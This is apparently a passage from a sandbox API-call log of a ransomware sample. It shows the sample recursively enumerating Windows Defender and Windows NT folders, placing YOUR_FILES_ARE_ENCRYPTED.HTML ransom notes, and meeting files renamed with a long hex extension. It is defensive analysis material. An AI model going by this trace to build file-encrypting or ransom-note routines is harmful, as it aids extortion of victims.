[0169.989] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.990] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0169.990] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.990] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.990] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0169.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.990] GetProcessHeap () returned 0x270000 [0169.991] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.991] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned 59 [0169.991] GetProcessHeap () returned 0x270000 [0169.991] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.991] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" [0169.991] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*" [0169.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc074d00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc074d00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.992] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0169.992] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.992] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.992] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0169.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\localcopy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.992] GetProcessHeap () returned 0x270000 [0169.993] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.993] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned 60 [0169.993] GetProcessHeap () returned 0x270000 [0169.993] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.993] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" [0169.994] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*" [0169.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc09ae60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc09ae60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.994] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.994] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.994] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.994] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\quarantine\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.994] GetProcessHeap () returned 0x270000 [0169.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.996] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned 55 [0169.996] GetProcessHeap () returned 0x270000 [0169.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.996] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" [0169.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*" [0169.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc0c0fc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0c0fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.996] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned 63 [0169.996] GetProcessHeap () returned 0x270000 [0169.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.996] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" [0169.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*" [0169.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcc0c0fc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0c0fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.996] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 76 [0169.997] GetProcessHeap () returned 0x270000 [0169.997] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.999] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0169.999] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*" [0169.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcc09ae60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc09ae60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.000] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0170.000] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.000] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.000] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0170.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.000] GetProcessHeap () returned 0x270000 [0170.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0170.001] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 71 [0170.001] GetProcessHeap () returned 0x270000 [0170.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0170.001] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0170.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*" [0170.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcc0c0fc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0c0fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.001] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0170.001] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.001] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.002] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0170.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.002] GetProcessHeap () returned 0x270000 [0170.003] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0170.003] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0170.003] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.003] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.003] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0170.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.003] GetProcessHeap () returned 0x270000 [0170.004] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.004] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.004] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.004] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.004] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.004] GetProcessHeap () returned 0x270000 [0170.005] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.005] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned 57 [0170.005] GetProcessHeap () returned 0x270000 [0170.005] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.005] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" [0170.005] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*" [0170.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc10d280, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc10d280, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.006] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned 148 [0170.006] lstrcmpW (lpString1="MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.006] PathFindExtensionW (pszPath="MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned=".B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23" [0170.006] lstrlenW (lpString=".B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned 65 [0170.006] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.006] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.006] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.006] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.006] GetProcessHeap () returned 0x270000 [0170.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.007] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.007] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.007] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.007] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.007] GetProcessHeap () returned 0x270000 [0170.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0170.014] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned 43 [0170.014] GetProcessHeap () returned 0x270000 [0170.014] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0170.016] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT" [0170.016] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*" [0170.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1cb960, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1cb960, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.016] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned 49 [0170.016] GetProcessHeap () returned 0x270000 [0170.016] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.019] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" [0170.019] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*" [0170.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1a5800, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1a5800, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.019] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 61 [0170.019] GetProcessHeap () returned 0x270000 [0170.019] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 